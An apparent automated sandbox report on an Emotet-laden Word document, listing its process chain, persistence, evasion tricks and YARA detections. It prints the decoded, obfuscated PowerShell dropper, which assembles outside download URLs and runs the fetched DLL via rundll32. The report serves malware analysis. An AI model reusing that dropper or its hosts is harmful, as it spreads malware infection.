                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
                      Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: powershell.exe, 00000005.00000002.2102033680.0000000003A65000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2100547515.000000001000D000.00000002.00020000.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2095912827.0000000002780000.00000002.00000001.sdmp
                      Source: bestand-8881014518 00944.docInitial sample: OLE summary subject = withdrawal Sports, Toys & Health budgetary management architectures Borders synthesize SSL Usability synergize e-commerce

                      Data Obfuscation:

                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                      Source: bestand-8881014518 00944.doc Stream path 'Macros/VBA/Oi5oelv0_s4' : High number of GOTO operations
                      Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Oi5oelv0_s4
                      Obfuscated command line found
                      Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD
                      PowerShell case anomaly found
                      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Suspicious powershell command line found
                      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FF002822CC pushad ; retf
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FF00282350 pushad ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10008085 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004ADA push ecx; ret

                      Persistence and Installation Behavior:

                      Creates processes via WMI
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2516Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2092815275.0000000000274000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: rundll32.exe, 00000007.00000002.2095781612.00000000006BD000.00000004.00000020.sdmpBinary or memory string: PPTP00VMware_S
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003AC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_020AC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0023C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0021C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_003DC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      Encrypted powershell cmdline option found
                      Source: unknownProcess created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004C5A cpuid
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected Emotet
                      Source: Yara matchFile source: 00000009.00000002.2098442031.00000000003A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2346389267.00000000003D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2095140776.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2108654595.00000000020A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2099597236.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2095230919.0000000000261000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2107302523.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2096491142.0000000000241000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2104856163.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2346371672.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2101735840.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2101060119.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2101000772.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2107439959.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2101688824.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2108653259.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2103856048.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2099670858.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2098319985.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2106854955.0000000000470000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2108749500.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2104985518.0000000000261000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2096383511.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2103936335.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 13.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.470000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
